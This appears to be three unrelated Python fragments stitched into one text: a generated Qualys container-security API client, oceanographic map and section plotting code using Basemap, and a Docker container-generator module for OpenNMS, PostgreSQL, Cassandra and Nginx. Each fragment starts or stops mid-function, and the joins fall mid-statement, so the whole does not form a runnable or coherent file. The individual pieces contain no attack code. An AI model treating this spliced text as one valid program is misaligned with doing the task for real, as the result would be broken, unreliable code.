raise ValueError("Missing the required parameter `registry_id` when calling `get_cs_registry_repositories`") # noqa: E501
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryId'] = params['registry_id'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_number' in params:
query_params.append(('pageNumber', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/registry/{registryId}/repository', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Repositories', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cs_registry_schedules(self, registry_id, **kwargs): # noqa: E501
"""Show a list of schedules created for a registry # noqa: E501
Show a list of schedules created for a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_schedules(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the schedules. (required)
:param str filter: Filter the schedules list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Schedules
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cs_registry_schedules_with_http_info(registry_id, **kwargs) # noqa: E501
else:
(data) = self.get_cs_registry_schedules_with_http_info(registry_id, **kwargs) # noqa: E501
return data
def get_cs_registry_schedules_with_http_info(self, registry_id, **kwargs): # noqa: E501
"""Show a list of schedules created for a registry # noqa: E501
Show a list of schedules created for a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_schedules_with_http_info(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the schedules. (required)
:param str filter: Filter the schedules list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Schedules
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id', 'filter', 'page_number', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cs_registry_schedules" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params or
params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `get_cs_registry_schedules`") # noqa: E501
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryId'] = params['registry_id'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', | |
transform=ax[cik].transAxes,horizontalalignment='right',verticalalignment='top',fontsize=10)
else:
ax[cik].text(0,0.9,' S',transform=ax[cik].transAxes,horizontalalignment='left',verticalalignment='top',fontsize=10)
ax[cik].text(1,0.9,' N',transform=ax[cik].transAxes,horizontalalignment='right',verticalalignment='top',fontsize=10)
if platform[ri].lat.values[0] > platform[ri].lat.values[-1]:
ax[cik].invert_xaxis()
cik = cik + 1
#return ax
def plot_map_view(sadcp=None, ctd_data=None, glider_track=None, ladcp_data=None, scanfish_data=None, scan_sadcp=None, ctd_ladcp=None,
topo=None,sst_map=None,sst_map1=None,ssh_name='sst',x_lim=[0,180]):
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from oceans.datasets import etopo_subset
from oceans.sw_extras import gamma_GP_from_SP_pt
from matplotlib.patches import Polygon
import gsw
from matplotlib import animation, rc
from IPython.display import HTML
import pandas as pd
# Stations map.
fig, ax = plt.subplots(ncols = 2, sharey=True, figsize=(15,8))
sst_range = np.array((15,19))
ssh_range = np.array((0.25,0.4))
Ro_range = np.array((-0.4,0.4))
lat_1, lat_2, lon_0, lat_0 = -25., -27.5, 13, -26.
for si in np.array((0,1)):
# setup map
m = Basemap(width=450000,height=300000,resolution='i',projection='aea',lon_0=lon_0,lat_0=lat_0)
m.ax = ax[si]
m.drawcoastlines()
m.fillcontinents(color='0.85')
m.drawparallels(np.arange(-90., 91., 1.), labels=[True, False, False, False], dashes=[2, 2])
m.drawmeridians(np.arange(-180., 181., 1.), labels=[False, False, False, True], dashes=[2, 2])
# add contour lines of bathymetry
lon2, lat2 = np.meshgrid(topo.lon.values,topo.lat.values)
#m.contourf(lon2, lat2,topo.Band1,40,cmap=plt.cm.Blues_r,latlon=True)
m.contour(lon2, lat2,topo.Band1,5,linestyles='solid',linewidths=1.,colors='0.35',latlon=True)
if si == 0:
# === SST MAP ===
lon2, lat2 = np.meshgrid(sst_map.lon.values,sst_map.lat.values)
#m.contourf(lon2, lat2, sst_map.analysed_sst[0,:,:],40,cmap=plt.cm.coolwarm,latlon=True)
sst_plt = m.pcolormesh(lon2, lat2, sst_map.sst,vmin=sst_range[0],vmax=sst_range[1],cmap=plt.cm.coolwarm,latlon=True)
plt.text(1,1,sst_map.time_coverage_start[:-8],transform=m.ax.transAxes,horizontalalignment='right',verticalalignment='bottom')
else:
# === SSH MAP ===
#m.contourf(lon2, lat2, sst_map1.analysed_sst[0,:,:],40,cmap=plt.cm.coolwarm,latlon=True)
lon2, lat2 = np.meshgrid(sst_map1.lon_left.values,sst_map1.lat_left.values)
Ro_plt = m.pcolormesh(lon2, lat2, sst_map1.Ro,vmin=Ro_range[0],vmax=Ro_range[1],cmap=plt.cm.coolwarm,latlon=True)
lon2, lat2 = np.meshgrid(sst_map1.lon.values,sst_map1.lat.values)
ssh_plt = m.contour(lon2, lat2, sst_map1.adt,5,linestyles='solid',linewidths=2.,colors='0.01',latlon=True)
ssh_date = pd.Series(sst_map1.time.values)
plt.text(1,1,(str(ssh_date[0].year)+'-'+str(ssh_date[0].month)+'-'+str(ssh_date[0].day)),
transform=m.ax.transAxes,horizontalalignment='right',verticalalignment='bottom')
# === SSH MAP ===
#lon2, lat2 = np.meshgrid(ssh_map.lon.values,ssh_map.lat.values)
#ssh_plt = m.contour(lon2, lat2, ssh_map.sla[0,:,:],vmin=ssh_range[0],vmax=ssh_range[1],colors='0.5',latlon=True) #
#plt.text(0,1,ssh_map.time_coverage_start[:-4],transform=m.ax.transAxes,horizontalalignment='left',verticalalignment='bottom')
#if hasattr(sst_map1, 'ugos'):
# add Geostrophic current vectors
gos_plt = m.quiver(lon2, lat2, sst_map1.ugos,sst_map1.vgos,latlon=True)#,scale=700)
# make quiver key.
qk = plt.quiverkey(gos_plt, 0.8, 0.8, 0.1, '0.1 m/s', labelpos='W')
if sadcp is not None:
# plot ship track from SADCP data
m.plot(sadcp.lon.values, sadcp.lat.values,'-',color='0.55', latlon=True)
if ctd_data is not None:
# plot ladcp/ctd stations
m.plot(ctd_data.lon.values, ctd_data.lat.values, 'ko', latlon=True)
#m.plot(ladcp_data.lon.values, ladcp_data.lat.values, 'b.', latlon=True)
if glider_track is not None:
# plot glider track
m.plot(glider_track[0,:].values, glider_track[1,:].values, color='#3cb371',lw=2, latlon=True)
# plot sections that are used below
if ctd_ladcp is not None:
for ri in range(len(ctd_ladcp)):
m.plot(ctd_ladcp[ri].lon.dropna('xy').values,ctd_ladcp[ri].lat.dropna('xy').values, '.', color= 'chartreuse', latlon=True)
if si == 0:
skip=1
ladcp_plt = m.quiver(ctd_ladcp[ri].lon.dropna('xy')[::skip].values, ctd_ladcp[ri].lat.dropna('xy')[::skip].values,
ctd_ladcp[ri].u.sel(z=ctd_ladcp[ri].z[-5]).dropna('xy')[::skip].values,
ctd_ladcp[ri].v.sel(z=ctd_ladcp[ri].z[-5]).dropna('xy')[::skip].values,
latlon=True)
# make quiver key.
qk = plt.quiverkey(ladcp_plt, 0.9, 0.9, 0.1, '0.1 m/s', labelpos='W')
start_end_date = pd.Series([ctd_ladcp[0].time[0].values,ctd_ladcp[-1].time[-1].values])
if scan_sadcp is not None:
for ri in range(len(scan_sadcp)):
m.plot(scan_sadcp[ri].lon.dropna('xy').values,scan_sadcp[ri].lat.dropna('xy').values, lw = 4, color= 'SlateGrey', latlon=True)
if si == 0:
skip=5
sadcp_plt = m.quiver(scan_sadcp[ri].lon.dropna('xy')[::skip].values, scan_sadcp[ri].lat.dropna('xy')[::skip].values,
scan_sadcp[ri].u.sel(z=scan_sadcp[ri].z[-5]).dropna('xy')[::skip].values,
scan_sadcp[ri].v.sel(z=scan_sadcp[ri].z[-5]).dropna('xy')[::skip].values,
latlon=True)
# make quiver key.
qk = plt.quiverkey(sadcp_plt, 0.9, 0.9, 0.1, '0.1 m/s', labelpos='W')
start_end_date = pd.Series([scan_sadcp[0].time[0].values,scan_sadcp[-1].time[-1].values])
m.drawmapscale(14.5, -25.5, 15, -25.5, 50,barstyle='fancy')
#if si == 0:
# plt.colorbar(sst_plt)#, ticks=[-0.5, 0, 0.5])
#else:
# plt.colorbar(ssh_plt)#, ticks=[-0.5, 0, 0.5])
if si == 0:
# add inset showing globe
add_globalmap_inset(m)
# date range of data being plotted
if scan_sadcp is not None or ctd_ladcp is not None:
plt.text(0,1,(str(start_end_date[0].year)+'-'+str(start_end_date[0].month)+'-'+str(start_end_date[0].day)+':'+str(start_end_date[1].month)+'-'+str(start_end_date[1].day)),
transform=m.ax.transAxes,horizontalalignment='left',verticalalignment='bottom')
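# --- Usage sketch (dataset variables are assumptions: topo, sst and adt would be
# xarray Datasets loaded earlier in the notebook/session) ---
#
# >>> plot_map_view(sadcp=sadcp, ctd_data=ctd_data, topo=topo,
# ...               sst_map=sst, sst_map1=adt, x_lim=[0, 180])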
def make_movie_ship_tracks(topo,sadcp,ladcp_data):
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from oceans.datasets import etopo_subset
from oceans.sw_extras import gamma_GP_from_SP_pt
from matplotlib.patches import Polygon
import gsw
from matplotlib import animation, rc
from IPython.display import HTML
fig, ax = plt.subplots(figsize=(15,8))
lat_1, lat_2, lon_0, lat_0 = -25., -27.5, 13, -26.
# setup map
m = Basemap(width=450000,height=300000,resolution='i',projection='aea',lon_0=lon_0,lat_0=lat_0)
m.ax = ax
m.drawcoastlines()
m.fillcontinents(color='0.85')
m.drawparallels(np.arange(-90., 91., 1.), labels=[True, False, False, False], dashes=[2, 2])
m.drawmeridians(np.arange(-180., 181., 1.), labels=[False, False, False, True], dashes=[2, 2])
# add contour lines of bathymetry
lon2, lat2 = np.meshgrid(topo.lon.values,topo.lat.values)
m.contourf(lon2, lat2,topo.Band1,40,cmap=plt.cm.Blues_r,latlon=True)
quad1b = m.plot(sadcp.lon.values[0], sadcp.lat.values[0],'ok',latlon=True,alpha=0.5)
quad1c = m.plot(sadcp.lon.values[0], sadcp.lat.values[0],'ok',latlon=True,alpha=0.5)
#timelabel = m.text(0.1,1, "",horizontalalignment='left', verticalalignment='bottom', transform=ax.transAxes)
timelabel = plt.text(1,1,"",transform=m.ax.transAxes,horizontalalignment='right',verticalalignment='bottom')
# initialization function: plot the background of each frame
# plots the parts of the image that don’t change between frames, and adds all of the parts that will change to the axes of this image
def init():
#quad1.set_array([])
#quad1b.set_array([])
#quad1c.set_array([])
return quad1b,quad1c,
# animation function. This is called sequentially
# The function will automatically get passed one argument: the frame number currently being generated.
# Additional arguments can be specified using the fargs argument in FuncAnimation.
dt_advance = 10 # how many timesteps to advance each image
t_start = 500
t_end = sadcp.lon.shape[0]
color_idx = np.linspace(0, 1, int(np.ceil((sadcp.lon.shape[0]-t_start)/dt_advance)))
def animate(t):
marker_style = dict(color=plt.cm.plasma(color_idx[int(t/dt_advance)]), linestyle='none', marker='.',
markersize=12, markerfacecolor=plt.cm.plasma(color_idx[int(t/dt_advance)]), alpha=0.5)
t_plot = t_start + t
timelabel.set_text('t = %s' %sadcp.time[t_plot].values)
quad1c[0] = m.plot(sadcp.lon.values[t_plot-dt_advance:t_plot], sadcp.lat.values[t_plot-dt_advance:t_plot],'-',color='0.65',lw=2,latlon=True,alpha=0.5)
# plot ladcp/ctd stations
if t == 0:
ind_pts_to_plot = ladcp_data.time <= sadcp.time[t_plot]
else:
ind_pts_to_plot = np.logical_and(ladcp_data.time <= sadcp.time[t_plot],ladcp_data.time > sadcp.time[t_plot-dt_advance]).values
quad1b[0] = m.plot(ladcp_data.lon.values[ind_pts_to_plot], ladcp_data.lat.values[ind_pts_to_plot],latlon=True,**marker_style)
return quad1b,quad1c,timelabel,
# call the animator. blit=True means only re-draw the parts that have changed.
# fargs are the other inputs
anim1 = animation.FuncAnimation(fig, animate, init_func=init,
frames=np.arange(0,t_end-t_start,dt_advance), interval=150) # blank with blit; bigger interval slows it down
return anim1
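# --- Display sketch: the returned FuncAnimation renders inline in a notebook via
# IPython.display.HTML (requires ffmpeg for to_html5_video; illustrative) ---
#
# >>> from IPython.display import HTML
# >>> anim = make_movie_ship_tracks(topo, sadcp, ladcp_data)
# >>> HTML(anim.to_html5_video())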
def map_limits(m):
from mpl_toolkits.basemap import Basemap
llcrnrlon = min(m.boundarylons)
urcrnrlon = max(m.boundarylons)
llcrnrlat = min(m.boundarylats)
urcrnrlat = max(m.boundarylats)
return llcrnrlon, urcrnrlon, llcrnrlat, urcrnrlat
#def make_map(llcrnrlon=10, urcrnrlon=16, llcrnrlat=22, urcrnrlat=28,
# projection='merc', resolution='i', figsize=(6, 6), inset=True):
# m = Basemap(llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,
# llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,
# projection=projection, resolution=resolution)
#def make_map(ax, lat_1=-20.,lat_2=-32,lon_0=13,lat_0=-25,
# projection='merc', resolution='i', figsize=(6, 6), inset=True):
# m = Basemap(llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,
# llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,
# projection=projection, resolution=resolution)
# m = Basemap(width=650000,height=550000,resolution='i',projection='aea',lat_1=lat_1,lat_2=lat_2,lon_0=lon_0,lat_0=lat_0)
#fig, ax = plt.subplots(figsize=figsize)
#m.drawstates()
# m.drawcoastlines()
# m.fillcontinents(color='0.85')
# meridians = np.arange(llcrnrlon, urcrnrlon + 2, 2)
# parallels = np.arange(llcrnrlat, urcrnrlat + 1, 1)
# m.drawparallels(parallels, linewidth=0, labels=[1, 0, 0, 0])
# m.drawmeridians(meridians, linewidth=0, labels=[0, 0, 0, 1])
# m.drawparallels(np.arange(-90.,91.,1.),labels=[True,True,False,False],dashes=[2,2])
# m.drawmeridians(np.arange(-180.,181.,1.),labels=[False,False,False,True],dashes=[2,2])
# m.ax = ax
def add_globalmap_inset(m):
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from matplotlib.patches import Polygon
axin = inset_axes(m.ax, width="30%", height="30%", loc=2)
# Global inset map.
inmap = Basemap(lon_0=np.mean(m.boundarylons),
lat_0=np.mean(m.boundarylats),
projection='ortho', ax=axin, anchor='NE')
inmap.drawcountries(color='white')
inmap.fillcontinents(color='gray')
bx, by = inmap(m.boundarylons, m.boundarylats)
xy = list(zip(bx, by))
mapboundary = Polygon(xy, edgecolor='k', linewidth=1, fill=False)
inmap.ax.add_patch(mapboundary)
return m
def OLD_plot_profile_view(scan_sadcp, ctd_ladcp, x_lim=[0,180],M2_flag=None):
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook
from oceans.sw_extras import gamma_GP_from_SP_pt
from matplotlib.patches import Polygon
import gsw
import pandas as pd
# ================
# Plot u,v,CT,RHO sections.
# if no CTD, plot M2, Rib
# ================
U_range = np.array((-0.4,0.4))
T_range = np.array((15,18)) #sst_range
Rho_range = np.array((1025.6,1026.6)) #((ctd_data.RHO.min(),ctd_data.RHO.max()))
sigma_range = np.array((25.6,26.)) #Rho_range-1000
N2_range = np.array((-5,-3)) #np.array((0.0001,0.1)) #Rho_range-1000
M2_range = np.array((-7,-6)) #np.array((0.0001,0.1)) #Rho_range-1000
Ri_range = np.array((0,1)) #Rho_range-1000
#x_lim = [0,180]
sigma_levels = np.arange(sigma_range[0]+.2,sigma_range[1]+.2,0.2)
# pick the desired colormap, sensible levels, and define a normalization
# instance which takes data values and translates those into levels.
from matplotlib.colors import BoundaryNorm
cmap = plt.cm.RdBu_r
levels = np.arange(-0.5,0.5,0.001)
norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)
shading_type = 'flat'
ncols, nrows = 8, 2
if M2_flag is not None: ncols, nrows = 8, 2  # same grid either way; kept explicit for clarity
fig, ax = plt.subplots(nrows = nrows, ncols = ncols, sharey=True, figsize=(20,10))
for ri in range(len(scan_sadcp)):
# now add SADCP
ci_next = np.array((0,1)) + 2*ri
rik = 0
for ci in ci_next:
if ci == ci_next[0] and M2_flag is None: var_name, v_range, cmap_in = 'u' , U_range, plt.cm.RdBu_r#, 'flat'
if ci == ci_next[1] and M2_flag is None: var_name, v_range, cmap_in = 'v' , U_range, plt.cm.RdBu_r#, 'flat'
if ci == ci_next[0] and M2_flag is not None:
var_name, v_range, cmap_in = 'db_dx_log10', M2_range, plt.cm.Blues#, 'flat'
scan_sadcp[ri][var_name] = np.log10(scan_sadcp[ri]['db_dx'])
if ci == ci_next[1] and M2_flag is not None: var_name, v_range, cmap_in = 'Rib', Ri_range, plt.cm.Blues_r #, 'gouraud'
conmap = scan_sadcp[ri][var_name].reset_index('xy').plot.contourf(x='x_km',y='z',ax=ax[rik,ci],vmin=v_range[0],vmax=v_range[1],
cmap = cmap_in,
cbar_kwargs={'ticks': np.arange(v_range[0],v_range[1]+1,1),
'orientation':"horizontal",'pad': -0.2,
'label':''})
#conmap = ax[rik,ci].contourf(scan_sadcp[ri].distance/1000,scan_sadcp[ri].z,var2plot,
# vmin=v_range[0],vmax=v_range[1],cmap = cmap_in,shading=shading_type)
if ri > 0: # remove colorbar
conmap.colorbar.remove()
if ci == ci_next[0] and ctd_ladcp is None:
ax[rik,ci].set_title('u$_{SADCP}$ [ms$^{-1}$]')
if ci ==ci_next[1] and ctd_ladcp is None:
ax[rik,ci].set_title('v$_{SADCP}$ [ms$^{-1}$]')
if ci == ci_next[0] and ctd_ladcp is not None:
ax[rik,ci].set_title('M$^2_{SADCP}$ [s$^{-1}$]')
if ci ==ci_next[1] and ctd_ladcp is not None:
ax[rik,ci].set_title('Ri$^B_{SADCP}$ [-]')
if ci == ci_next[0] and rik ==0:
ax[rik,ci].set_ylabel('Depth [m]')
else:
ax[rik,ci].set_ylabel('')
ax[rik,ci].tick_params(labelleft=False)
if M2_flag is not None:
ax[rik,ci].set_xlabel('Distance [km]')
else:
ax[rik,ci].set_xlabel('')
ax[rik,ci].tick_params(labelbottom=False)
if ci == ci_next[0]:
dates = pd.Series(scan_sadcp[ri].time.values)
ax[rik,ci].text(0,0,(str(dates[0].month)+'-'+str(dates[0].day)+' '+str(dates[0].hour)+':'+str(dates[0].minute)),
transform=ax[rik,ci].transAxes,horizontalalignment='left',verticalalignment='bottom',fontsize=10)
ax[rik,ci].set_xlim(x_lim)
if scan_sadcp[ri].lat.values[0] > scan_sadcp[ri].lat.values[-1]:
ax[rik,ci].invert_xaxis()
dx,dy = 0,0 #np.mean(np.diff(scan_sadcp[ri].distance)), np.mean(np.diff(scan_sadcp[ri].z.values))
# contour needs matrices
X_grid, Y_grid = np.meshgrid(scan_sadcp[ri].distance +dx/2.,scan_sadcp[ri].z +dy/2.)
ax[rik,ci].contour(X_grid/1000, Y_grid, scan_sadcp[ri].sigma_0.T, levels = sigma_levels,colors='0.25',linewidths=0.5)
# now add Scanfish
if M2_flag is None:
rik = 1
for ci in ci_next:
if ci == ci_next[0]:
var_name2 | |
""" Container module.
This module defines the container definitions for container_generator.
"""
import os
import time
import hashlib
from collections import OrderedDict
from OpenSSL import crypto
from template_engine import TemplateEngine
from docker import DockerImage
from docker import DockerServiceConfig
class Container(object):
"""Abstract definition of a container
This class represents an abstract definition of a container. It should not
be used directly; instead, use a subclass that extends it.
Attributes:
container_name: unique name of the container
output_basedir: base directory for output data
Usage:
A subclass of this class should first be initialized with __init__().
The method get_default_parameters() returns all parameters for a
container with default values. After that, the setup_container() method
creates all configuration and files needed for the specific container.
"""
default_parameters = OrderedDict()
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
self._container_name = container_name
self._container_parameters = OrderedDict()
self._container_proxylocations = []
self._container_outputdir = output_basedir + "/init/" + container_name
self._container_imagedir = output_basedir + "/images/"
self._container_imagename = self._container_name + ".tar"
self._container_namedvolumes = []
self._container_config = DockerServiceConfig(container_name)
self._app_config = app_config
# create output directories if not exist
os.makedirs(self._container_outputdir, exist_ok=True)
# init with a copy of default_parameters so instances do not mutate the shared class-level dict
self._container_parameters = OrderedDict(type(self).default_parameters)
def get_name(self):
"""Returns the container name"""
return self._container_name
def get_image_filename(self):
"""Returns the filename for the stored image"""
return "images/" + self._container_imagename
def setup_container(self, parameters):
"""Setup an container
This method must be implemented by a subclass. The following things
should be done in this method:
- setup proxy locations in self._container_proxylocations
- create container config in self._container_config
Args:
parameters: parameters for the container
"""
pass
def get_container_config(self):
"""Return the container config
Return:
The container config as DockerServiceConfig object
"""
return self._container_config
def get_proxy_locations(self):
"""Return all proxy locations that should be created for this one"""
return self._container_proxylocations
def get_named_volumes(self):
"""Return a list with all configured named volumes"""
return self._container_namedvolumes
def download_image(self):
"""Export the container's Docker image as a tar archive into the image directory."""
# create image dir if not exist
os.makedirs(self._container_imagedir, exist_ok=True)
image_name = self._container_config.get_image()
output_filename = self._container_imagedir + self._container_imagename
docker_image = DockerImage(image_name)
docker_image.export_image(output_filename)
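# --- Subclass sketch (hypothetical service, following the Usage notes in the
# Container docstring; the image name and parameter are illustrative) ---
#
# class ExampleService(Container):
#     """Minimal container definition following the Container contract."""
#     default_parameters = OrderedDict([("service_password", "<PASSWORD>")])
#
#     def setup_container(self):
#         self._container_config.set_image("nethinks/opennmsenv-example:1.0.0-1")
#         self._container_config.set_restart_policy("always")
#         self._container_config.add_environment(
#             "SERVICE_PASSWORD", self._container_parameters["service_password"])
#         self._container_namedvolumes.append("example")
#         self._container_config.add_volume("example:/data/container")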
class OpenNMS(Container):
"""Class for defining a container for OpenNMS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_server", "postgres"),
("database_user", "postgres"),
("database_password", "<PASSWORD>"),
("user_admin_password", "<PASSWORD>"),
("user_api_password", "<PASSWORD>"),
("cassandra_server", "cassandra"),
("cassandra_user", "cassandra"),
("cassandra_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["user_admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["user_api_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "OpenNMS",
"location": "/opennms",
"url": "http://opennms:8980"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-opennms:18.0.4-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/opennms")
self._container_config.add_buildarg("build_customrepo", "https://opennmsdeploy.nethinks.com/repo/horizon/18.0.4/")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.set_privileged(True)
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_DB_SERVER",
self._container_parameters["database_server"])
self._container_config.add_environment("INIT_DB_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("INIT_DB_PASSWORD",
self._container_parameters["database_password"])
self._container_config.add_environment("INIT_ADMIN_USER", "admin")
self._container_config.add_environment("INIT_ADMIN_PASSWORD",
self._container_parameters["user_admin_password"])
self._container_config.add_environment("INIT_API_USER", "api")
self._container_config.add_environment("INIT_API_PASSWORD",
self._container_parameters["user_api_password"])
self._container_namedvolumes.append("opennms")
self._container_namedvolumes.append("rrd")
self._container_config.add_volume("opennms:/data/container")
self._container_config.add_volume("rrd:/data/rrd")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/opennms:/data/init")
self._container_config.add_port("162/udp:162/udp")
self._container_config.add_port("514/udp:514/udp")
self._container_config.add_port("5817:5817")
self._container_config.add_dependency("postgres")
# check cassandra option and parameters
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_environment("INIT_CASSANDRA_ENABLE", "true")
self._container_config.add_environment("INIT_CASSANDRA_SERVER",
self._container_parameters["cassandra_server"])
self._container_config.add_environment("INIT_CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("INIT_CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_config.add_dependency("cassandra")
class PostgreSQL(Container):
"""Class for defining a container for PostgreSQL
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_user", "postgres"),
("database_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-postgres:9.5.3-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/postgres")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("POSTGRES_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("POSTGRES_PASSWORD",
self._container_parameters["database_password"])
self._container_namedvolumes.append("postgres")
self._container_config.add_volume("postgres:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/postgres:/data/init")
class Cassandra(Container):
"""Class for defining a container for Newts/Cassandra
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("cassandra_user", "cassandra"),
("cassandra_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "<PASSWORD>")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-cassandra:3.0.14-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/cassandra")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_namedvolumes.append("cassandra")
self._container_config.add_volume("cassandra:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/cassandra:/data/init")
class Nginx(Container):
"""Class for defining a container for Nginx
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssl_organisation", "NETHINKS GmbH"),
("ssl_unit", "PSS"),
("ssl_country", "DE"),
("ssl_state", "HESSEN"),
("ssl_location", "Fulda"),
("ssl_cn", "localhost"),
("ssl_valid_time_days", "3650"),
("ssl_keylength", "4096"),
("ssl_digest", "sha384")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssl_organisation"] = self._app_config.get_value("ssl", "organisation", "")
self._container_parameters["ssl_unit"] = self._app_config.get_value("ssl", "unit", "")
self._container_parameters["ssl_country"] = self._app_config.get_value("ssl", "country", "")
self._container_parameters["ssl_state"] = self._app_config.get_value("ssl", "state", "")
self._container_parameters["ssl_location"] = self._app_config.get_value("ssl", "location", "")
self._container_parameters["ssl_cn"] = self._app_config.get_value("ssl", "cn", "")
self._container_parameters["ssl_valid_time_days"] = self._app_config.get_value("ssl", "valid_time_days", "")
self._container_parameters["ssl_keylength"] = self._app_config.get_value("ssl", "keylength", "")
self._container_parameters["ssl_digest"] = self._app_config.get_value("ssl", "digest", "")
self._container_parameters["support_text"] = self._app_config.get_value("supportinfo", "support_text", "")
self.__proxy_locations = []
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-nginx:1.10.2-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/nginx")
self._container_config.set_restart_policy("always")
self._container_config.add_port("80:80")
self._container_config.add_port("443:443")
self._container_namedvolumes.append("nginx")
self._container_config.add_volume("nginx:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/nginx:/data/init")
self._container_config.add_environment("INIT_SSL_CN",
self._container_parameters["ssl_cn"])
self._container_config.add_environment("INIT_SSL_ORG",
self._container_parameters["ssl_organisation"])
